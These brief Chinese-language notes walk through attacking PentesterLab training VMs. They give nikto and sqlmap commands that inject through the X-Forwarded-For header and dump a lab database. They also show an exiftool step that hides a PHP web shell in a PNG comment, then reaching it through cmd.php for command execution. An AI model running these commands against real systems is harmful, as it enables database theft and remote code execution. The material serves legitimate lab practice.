sql注入靶机攻击过程请参考
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
xss靶机的攻击过程请参考
https://pentesterlab.com/exercises/xss_and_mysql_file/course
nikto –h 192.168.1.129
sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" --dbs --batch
sqlmap -u "http://192.168.1.129/cat.php?id=1" --headers="X-Forwarded-For:*" -D photoblog --dump-all --batch
登陆
键入以下命令,使用exiftool将PHP恶意代码隐藏到png图片中:
Cd Desktop
Exiftool “-comment<=raj.php” 1.png
Exiftool 1.png
打开图片那个网址id=4 并查看原图 再写入/cmd.php?cmd